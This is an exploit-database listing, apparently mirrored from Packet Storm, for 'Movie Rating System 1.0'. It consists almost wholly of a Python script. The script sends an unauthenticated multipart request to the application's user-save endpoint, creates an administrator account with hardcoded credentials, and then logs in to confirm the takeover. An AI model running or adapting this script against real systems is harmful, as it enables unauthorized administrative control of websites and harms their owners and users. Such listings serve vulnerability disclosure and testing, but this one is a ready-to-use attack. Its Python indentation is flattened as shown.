Exploit for Movie Rating System 1.0 Broken Access Control

Name: Exploit for Movie Rating System 1.0 Broken Access Control
Rating: 5 (170 reviews)
2022-01-05 | CVSS 0.3
## https://sploitus.com/exploit?id=PACKETSTORM:165436
# Exploit Title: Movie Rating System 1.0 - Broken Access Control (Admin Account Creation) (Unauthenticated)  
# Date: 22/12/2021  
# Exploit Author: Tagoletta (Tağmaç)  
# Software Link: https://www.sourcecodester.com/php/15104/sentiment-based-movie-rating-system-using-phpoop-free-source-code.html  
# Version: 1.0  
# Tested on: Windows  
  
import requests  
import json  
  
url = input('Url:')  
if not url.startswith('http://') and not url.startswith('https://'):  
url = "http://" + url  
if not url.endswith('/'):  
url = url + "/"  
  
Username = "tago"  
Password = "tagoletta"  
  
reqUrl = url + "classes/Users.php?f=save"  
  
reqHeaders = {  
"Accept": "*/*",  
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryTagmac",  
"X-Requested-With": "XMLHttpRequest",  
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36",  
"Origin": url}  
  
reqData = "------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\nTago\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\nLetta\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n"+Username+"\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n"+Password+"\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"type\"\r\n\r\n1\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"img\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryTagmac--\r\n"  
  
resp = requests.post(reqUrl, headers=reqHeaders, data=reqData)  
  
if resp.status_code == 200:  
print("Admin account created")  
reqUrl = url + "classes/Login.php?f=login"  
  
reqHeaders = {  
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",  
"X-Requested-With": "XMLHttpRequest",  
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36",  
"Origin": url  
}  
  
reqData = {"username": ""+Username+"", "password": ""+Password+""}  
  
resp = requests.post(reqUrl, headers=reqHeaders, data=reqData)  
  
data = json.loads(resp.text)  
status = data["status"]  
  
if status == "success":  
print("Login Successfully\nUsername:"+ Username+"\nPassword:"+Password)  
else:  
print("Exploited but not loginned")  
else:  
print("Not injectable")